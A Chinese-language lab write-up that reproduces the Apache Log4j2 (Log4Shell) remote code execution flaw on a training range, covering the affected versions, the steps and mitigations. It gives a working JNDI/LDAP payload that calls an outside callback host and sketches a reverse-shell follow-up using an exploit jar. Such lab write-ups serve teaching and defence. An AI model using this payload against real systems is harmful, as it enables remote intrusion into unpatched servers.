Apache log4j2远程代码执行漏洞复现

Apache log4j2远程代码执行漏洞复现

Apache log4j2 远程代码执行漏洞复现

• 漏洞描述
• 漏洞影响范围
• 漏洞复现
• • 步骤：
  • 深度利用——反dshell
• 防御措施

漏洞描述

Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架，并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发，用来记录日志信息。

在大多数情况下，开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的请求包，最终出发远程代码执行。该漏洞实际上是组件解析缺陷导致的。

漏洞影响范围

2.0 <= Apache Log4j2<= 2.14.1
如果Java应用中引入了log4j-api、log4j-core两个jar，则极大可能受到影响。电力运营商金融行业，都是重灾区。

这个漏洞在安全圈掀起了轩然大波，由于具体的payload公开，大量的网站都存在这个问题，例如百度、ICloud等等知名网站。攻击者能够通过该漏洞进行数据窃取、挖矿、勒索，堪比互联网内的“新冠”。被圈内人称为核d级漏洞、史诗级漏洞也毫不夸张。

漏洞复现

漏洞复现平台：云演

地址：https://www.yunyansec.com/#/experiment/vulndetail/123/0

步骤：

1. 打开靶场网址
   

2. 构造如下插件中所示的payload，执行，页面已经出现OK，证明执行成功
   url: xxxxxx/hello
   发送post请求
   payload=${jndi:ldap://xxxxx.dnslog.cn/exp}
   

3. 如下所示，dnslog网站已经成功回显我们要攻击的靶机ip，证明恶意payload执行成功。说明该网站存在Apache log4j2远程代码执行漏洞。

深度利用——反dshell

利用此工具（JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar）构造一个LDAP 或 RMI服务器。
接下来构造payload…跟上面的用dnslog来验证是否存在漏洞过程相同。

此漏洞就是这么简单，正所谓 *** 作简单，而危害却极大，所以它犹如核d一般，爆出来后，所向披靡，杀疯了，在安全圈炸了锅。。。

防御措施

1. 排查应用是否引入了Apache Log4j2 Jar包，若存在依赖引入，则可能存在漏洞影响。请尽快升级Apache Log4j2所有相关应用到最新的log4j-2.15.0-rc2 版本。
   地址：https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2
2. 升级已知受影响的应用及组件，如 spring-boot-starter-log4j2/Apache Struts2/Apache Solr/Apache Druid/Apache Flink
3. 可升级jdk版本至6u211 / 7u201 / 8u191 / 11.0.1以上，可以在一定程度上限制JNDI等漏洞利用方式。